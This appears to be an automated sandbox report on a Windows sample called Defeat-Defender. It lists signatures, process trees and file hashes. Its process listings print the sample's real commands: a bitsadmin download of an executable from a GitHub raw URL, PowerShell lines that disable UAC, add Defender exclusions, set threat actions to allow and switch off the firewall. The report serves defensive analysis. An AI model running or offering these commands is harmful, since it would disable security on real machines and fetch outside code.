Malware Analysis Report

2024-10-16 05:03

Sample ID 240806-x91b3ssamf
Target Defeat-Defender-V1.2.0-main.zip
SHA256 9a6e38be267702f3b397fdc416dc2d0d520239dc8d3d983e353e0422ac7941fe
Tags dropper evasion execution persistence privilege_escalation trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral3
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral4
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral5
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral6
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10
SHA256 9a6e38be267702f3b397fdc416dc2d0d520239dc8d3d983e353e0422ac7941fe

Threat Level: Known bad

The file Defeat-Defender-V1.2.0-main.zip was found to be: Known bad.

Malicious Activity Summary

dropper evasion execution persistence privilege_escalation trojan

UAC bypass

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Legitimate hosting services abused for malware hosting/C2

Event Triggered Execution: Netsh Helper DLL

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Modifies registry class

Checks processor information in registry

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-08-06 19:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-08-06 19:33
Reported 2024-08-06 19:36
Platform win7-20240729-en
Max time kernel 16s
Max time network 17s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target (identical rows collapsed; count in parentheses)
PID 2540 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe (x3)
PID 2540 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe (x3)

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"

C:\Windows\system32\cacls.exe

"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

C:\Windows\system32\wscript.exe

wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\tmp.vbs

MD5 9313d55e26ad30ddcbc046fe8013a21d
SHA1 a5712ce8864d7b0ca88b94c64226dfeb2221457f
SHA256 121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
SHA512 77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7

Analysis: behavioral2

Detonation Overview

Submitted 2024-08-06 19:33
Reported 2024-08-06 19:36
Platform win10v2004-20240802-en
Max time kernel 149s
Max time network 148s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"

Signatures

UAC bypass

Tags evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

Tags dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Modifies Windows Firewall

Tags evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Event Triggered Execution: Netsh Helper DLL

Tags persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target (identical rows collapsed; count in parentheses)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (x22)

Suspicious use of FindShellTrayWindow

Description Indicator Process Target (identical rows collapsed; count in parentheses)
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A (x25)

Suspicious use of WriteProcessMemory

Description Indicator Process Target (identical rows collapsed; count in parentheses)
PID 4824 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe (x2)
PID 4824 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe (x2)
PID 4824 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe (x2)
PID 4824 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 3848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 4928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4824 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 4544 wrote to memory of 3096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe (x2)
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe (x11)
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe (x23)

Uses Task Scheduler COM API

Tags persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"

C:\Windows\system32\cacls.exe

"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

C:\Windows\system32\wscript.exe

wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "netsh advfirewall set allprofiles state off"

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Documents\RestoreAdd.xlsx"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60673b37-9128-4018-9bd8-d6073175fef9} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0634ca4-ec5b-462c-b5df-fa7b30041b7e} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2968 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfc42829-52e8-4f35-93a7-c59cbeaf1372} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2744 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa8c8459-94e9-49ef-b2d8-0c6251b42a25} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4712 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4716 -prefMapHandle 4756 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46d0ee7c-afd8-4d62-a74f-ee81124ea5d6} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 3 -isForBrowser -prefsHandle 5452 -prefMapHandle 5448 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11539aa5-ffc0-469e-ae2a-70d5f5ee2b4a} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5564 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b214495-18e7-4d1e-8ab2-67ba649de502} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5760 -prefMapHandle 5768 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc444eed-2e08-408a-8efa-d3f1868ae8d4} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5972 -childID 6 -isForBrowser -prefsHandle 5996 -prefMapHandle 5992 -prefsLen 27211 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec55a889-6c6b-46a5-a0e9-fbd754832f4b} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

Network


Files

C:\Users\Admin\AppData\Local\Temp\tmp.vbs

MD5 9313d55e26ad30ddcbc046fe8013a21d
SHA1 a5712ce8864d7b0ca88b94c64226dfeb2221457f
SHA256 121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
SHA512 77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7

memory/464-2-0x00007FFE9D653000-0x00007FFE9D655000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hgmx1ug2.uev.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/464-5-0x00000194BF000000-0x00000194BF022000-memory.dmp

memory/464-13-0x00007FFE9D650000-0x00007FFE9E111000-memory.dmp

memory/464-14-0x00007FFE9D650000-0x00007FFE9E111000-memory.dmp

memory/464-17-0x00007FFE9D650000-0x00007FFE9E111000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2bdac358d06bbc173ed9b971328b99be
SHA1 b36ae68965e1989c12b33cbbdc873dbcb4863ef7
SHA256 b57143f72c786b38102de918ebf9248e1f8b1c13ddb50872d089750d6f12dc73
SHA512 50a55652b4214d61f974f060112e7f9635236df05c105e365d9fa87cefb090bd1fd25f968ebdef74a0f9d06a914087dcbb0f5889189e64d8152ad69397bff4c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 38f0f14cc7ca72ad51216866e66efb4e
SHA1 34ed0f47a4aaa95e786ca9f125b0341b38bfb9be
SHA256 668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501
SHA512 4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1aefe566d0c19c9e3ddaf9ea005f71c0
SHA1 8d8cfb0d2192706100eb241f38a32b31f03329f1
SHA256 dc85b671f8ebac6cfa68897b1826019925c95a5ec36676fe18ba0085f437905a
SHA512 f22782b33f7990a0783154fbe6d49e03f16c873a3b4c91f1fc5ed76d0e7b88f0df876ccdf007828ba4d9a5f97cb2362f922cbacad03de5804bc8abeb36cb2d09

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 083782a87bd50ffc86d70cbc6f04e275
SHA1 0c11bc2b2c2cf33b17fff5e441881131ac1bee31
SHA256 7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f
SHA512 a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 217d9191dfd67252cef23229676c9eda
SHA1 80d940b01c28e3933b9d68b3e567adc2bac1289f
SHA256 e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133
SHA512 86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

memory/4600-129-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-131-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-130-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-132-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-133-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-134-0x00007FFE791F0000-0x00007FFE79200000-memory.dmp

memory/4600-135-0x00007FFE791F0000-0x00007FFE79200000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 6b17eb8d08a33b0d5b71a8dddff6ba01
SHA1 42de4c02311cd9ddfa4093a3717e2b72f27fea7d
SHA256 11faf6d4b3ebc71622cb26c69f77cc905546d8602d47f3dac53edbca65321739
SHA512 8111c1719144e9695eb3fe53a57bf3ec53552a535181c79b8d4297fb00c0095eb24fe432a004266df0f4c7091131b94ef7e8b0b4479c748c571b7092fd13f7e1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 663cf8b6a51e3ccbea23420ccc18c7a5
SHA1 b75f0003f5237a6e1d92bbd8b3ec09b46d61e64b
SHA256 93c62247bde13e9d81bdc94a4c4b25cdf8f1182a2ce3f71b9a5fad9d06f29dc2
SHA512 26a3d419b05f87188bbf2c815e3dbc72c566c26dc922372508719dc1932bce2c369e6b3cc8042c534802ac5e9c517e1a1afa778b52434b9b9ec412244c82ff01

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 209ccebe007bd02a6ed398b58e396e9a
SHA1 efee58463413a6f45f774c0de70ec5804bd98358
SHA256 cc51857b0aa3ea42f08ee8a38658bbdeb65c8da9423d361c6743259cba521010
SHA512 844ed7757f5c3e4e8fdfc43c7fbb254b228be307f3a6556d15184aed251e3dc7ef9b4d270cba42f219ee74da7bd701250b45e7edbd78be01a9d7784f89c47012

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\activity-stream.discovery_stream.json.tmp

MD5 86506a4800f7637b54bb829ce57db262
SHA1 c36581f315f3a4485d7f2f17b0c999f18441ba2b
SHA256 4db2822ab4fc6eb1deaea875060fec7622847cfb01ffd9bba47dadccfb08a394
SHA512 37aea1b4605090110e5000bf54ed1c7c95591c6c38a8d1241d2f31abe7c79f17ea37f6bcad7f63cd9f215c9686217fac634d99672ea9c00c26c620d095dbe597

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\51f4caa7-2bd1-4ec3-8004-1811418c29f2

MD5 37fc5355273ca6d96ec2dc2cbc521570
SHA1 e6c588bb45c1b54205c2991f35508876a2374d26
SHA256 173fadcdf75446cef5507c8261832059eeff6eedd3597069d50a328610e8e868
SHA512 2350bc64e2ebb7dc1556f812fad1deab028eaf1040ccf65f062776caa60514d8ce55287d77ee0998aec5259e19686033fc43d537a000a2425a90ab2a59e2b775

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\e23b16cf-7dd7-449e-a198-4a473e8f4033

MD5 b111c8b757c16e6d177f3d310fc1f461
SHA1 4d8db094d53be5910dc26a42330f6dcb63ad7cb6
SHA256 e282f0a3a3765d48fd695d535415449336bb812f260bbace69eccd9e12a081b8
SHA512 f1d12d1a1da4ebb99e40d18b121f72600abe7bb77eb8ea6413a54893919c36c75682460188a3b7fa1f9fd3dd291b143bc3cc07c91e6d01f8f541a93c90afed55

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\109ebbf2-c959-46c0-9dce-57ab69297c1a

MD5 6122274942c316f4c28b56adba70eb41
SHA1 8babbf09fda8ca48cdd139236fc8a939d23b0b49
SHA256 680c640ab6b7d59682b8cd9a24e2bad6805845519ada87cec909fd95acd616dc
SHA512 29a58ebb574e03eada27a272a68c9e82504a2def1da22553acd7578daf7443cad34815ccbbeb7eb9044debe454fe399bc1bfb6b52153758c3546609c757a62cf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp

MD5 80fbd95a165e211af3b1628e62a20aee
SHA1 9a951366d5d1dc69daf318e3ad459a000ed2f72f
SHA256 167edc479be461887b6e6d8f3f1512cd499367c7fc17f041e9324033cacfb2b9
SHA512 b81c37a0873a0ee895fb141e60ecf1c1245e094a24fb7aeefbd675b08ac917fedbddd33d3328647b63eadb602c6272d892efa9ff3499e080f48707a2da2f3179

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp

MD5 af7f2f23af43f8c7fbb8c5186113fa0c
SHA1 00078bc10c52d0b3304fed9ae82da359bc542475
SHA256 9f76c4125f8f09603965f35da216c368222587caaa6322d0280fdca6064b8357
SHA512 3a596f35ee743af9568666a822b07d43eb00169f3f03fe253873cfaca279681c485dba29505dfc390841f39f2d7f57f4c02424d0db6fac8b0aaa3fe667e3df63

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js

MD5 6d5e0935a4489aa29b172a6b1d3ee009
SHA1 2172f0ff0973edb9ec426d0b73b73577aaf08ee3
SHA256 1c1f91470c1a9c57357f6b2c30ea43858ee3120408d3b094519544f801c84639
SHA512 635385b91088007eb8eeac4fff79752b8abbfe4da471e0a08e847a2cc3e5da9782e6b2b2a28e7cbe3cebedf0d1898e6e6e1782e1e83d1875f7c4188b69de54a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js

MD5 42d264a96957a61c3c49e3465317e8d5
SHA1 3fb4550a895d7b273eac54f88be752b6906e1558
SHA256 b6cbb9f1c12bad5fb701e161ce0fb4e4e05a9ca3b830645ac199cff9cecd06b9
SHA512 ba5cd4b192d2378fa37238a7ca77c667c87ed48dc76b117274d475b341d25cf75e07c22b7514e4740868073c7df15a28f16da49ccdfaa97155a019877e4aff09

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\AlternateServices.bin

MD5 a16857bc593b8fe295972e014e976aba
SHA1 7872314cd27f2bf6c62cbccb48cf3786e766bf12
SHA256 20e8b466c7082a5a4bb05a34028d9e0ba60c8d52ec9e3c3e3f4aa7af67ec6755
